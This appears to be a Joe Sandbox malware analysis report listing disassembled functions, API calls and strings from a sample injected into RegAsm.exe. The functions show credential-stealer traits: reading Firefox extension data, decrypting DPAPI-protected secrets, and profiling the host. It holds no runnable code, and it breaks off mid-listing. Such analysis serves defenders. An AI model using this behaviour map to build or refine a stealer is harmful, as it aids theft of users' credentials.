                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                    • String ID: %d MB$@
                                                                                    • API String ID: 3644086013-3474575989
                                                                                    • Opcode ID: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
                                                                                    • Instruction ID: ca080bb329355c7b2013afa2bdf3b2efff8528aa9c5ce76f1778211d5c0869c6
                                                                                    • Opcode Fuzzy Hash: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
                                                                                    • Instruction Fuzzy Hash: 8AF036B5A00218ABE7149BA4DC4AF7E76BEEB45705F400039F702E61C0D7B4D8058769
                                                                                    Function 00415CA5 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415CAA
                                                                                    • memset.MSVCRT ref: 00415CD6
                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415CF3
                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415D13
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415D42
                                                                                    • lstrcat.KERNEL32(?), ref: 00415D55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                    • String ID:
                                                                                    • API String ID: 2333602472-0
                                                                                    • Opcode ID: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                    • Instruction ID: b1237888a7669b0395c9cdb9a6d9471705cae356a33a5f6a680b3cc5b253afb1
                                                                                    • Opcode Fuzzy Hash: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                    • Instruction Fuzzy Hash: 8F419DB1D4021DABCF10EFA0DC86EDD7B7DAF18344F00456AB618A2191E7399A858BD2
                                                                                    Function 00417250 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                      • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                      • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                                    • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426B18,?,00000000,004265C7), ref: 004172F1
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                                    • ExitProcess.KERNEL32 ref: 0041731C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1043047581-0
                                                                                    • Opcode ID: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
                                                                                    • Instruction ID: d94f923eae08acc0ec9c25e643b9a8e0192b3615959a138ccc40586fc2a64efe
                                                                                    • Opcode Fuzzy Hash: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
                                                                                    • Instruction Fuzzy Hash: 38113D71900019BBCB11FBE2DD6ADEEB77DAE55304B50007EF502B24E1DF386A09CA69
                                                                                    Function 00403A54 Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00403A59
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                    • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CrackH_prologInternetlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 503950642-0
                                                                                    • Opcode ID: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                    • Instruction ID: cc07c141d42f95622a17f2cc37de93049e7409e5d01b43fa4466afa553a2edca
                                                                                    • Opcode Fuzzy Hash: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                    • Instruction Fuzzy Hash: B4114C71D00208ABCB24AFA5D805BDE7F78AF45325F20422AF921A62D0DB385A498B54
                                                                                    Function 0040B1E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425F30,00425C3B), ref: 0040B2A6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                    • API String ID: 2813378046-3310892237
                                                                                    • Opcode ID: d82d09ade0ba0a4835b3956aae4a2697323b81754fe74cb71676ab1b26c84f39
                                                                                    • Instruction ID: bb3a9efdf4450b2767142494be26f7b0dc10ed47a6f8b455ca68a0d11c56a3c9
                                                                                    • Opcode Fuzzy Hash: d82d09ade0ba0a4835b3956aae4a2697323b81754fe74cb71676ab1b26c84f39
                                                                                    • Instruction Fuzzy Hash: B2715C70905288AADB14FBE5D916BDDBBB4AF19308F50417EE805736C2DB78170CCBA6
                                                                                    Function 004064E5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004064EA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B9C,?,?,?,00425B97,?), ref: 004065A7
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B9B), ref: 0040661F
                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                                    Strings
                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                    • API String ID: 757424748-3463377506
                                                                                    • Opcode ID: b1ec59224834b8f79ed32a038f4b7da38d4618f543a9ad0f1e6d2df5f849b41d
                                                                                    • Instruction ID: 8db632add1ead28395c1f5c726ee2788193d5f270b99ec1c59b0dc1cdd27b91c
                                                                                    • Opcode Fuzzy Hash: b1ec59224834b8f79ed32a038f4b7da38d4618f543a9ad0f1e6d2df5f849b41d
                                                                                    • Instruction Fuzzy Hash: C3617270801544EECB25EBA4D915BEDBBB5EB29304F10507EE406736E2DB381A09CF69
                                                                                    Function 0040C186 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C18B
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                      • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                      • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                    • memcmp.MSVCRT ref: 0040C21C
                                                                                      • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                      • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                      • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                    • String ID: $DPAPI
                                                                                    • API String ID: 2477620391-1819349886
                                                                                    • Opcode ID: 548af4ef5a68c1d15bd34a1c9f3b88a4916ae1bc9e092e19947f3fc684f09504
                                                                                    • Instruction ID: 7c90c9c52161514f2ce6f88b14c0e6cf6dad8cdca0aeae51f6cfd95d0e4443f7
                                                                                    • Opcode Fuzzy Hash: 548af4ef5a68c1d15bd34a1c9f3b88a4916ae1bc9e092e19947f3fc684f09504
                                                                                    • Instruction Fuzzy Hash: EA21A272D00109ABCF10ABE5CD429EFBB79AF54314F14027BF901B11D2EA399A958699
                                                                                    Function 0041064B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?), ref: 00410694
                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000), ref: 004106B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID: Windows 11
                                                                                    • API String ID: 3676486918-2517555085
                                                                                    • Opcode ID: 7cca10c1b5c7dd35db0d4f8c6a920e7d0fee12f9d646c557380bc34a9577cd99
                                                                                    • Instruction ID: 81a682fe0d96866a8c385725fbf1601ecc6145704a13890b4f9ee07a06a14e80
                                                                                    • Opcode Fuzzy Hash: 7cca10c1b5c7dd35db0d4f8c6a920e7d0fee12f9d646c557380bc34a9577cd99
                                                                                    • Instruction Fuzzy Hash: F0F06879640215FBEB105BD1DD0AF9A7A7EEB45B04F101075FB01D51A0D7F499509724
                                                                                    Function 0040FB50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
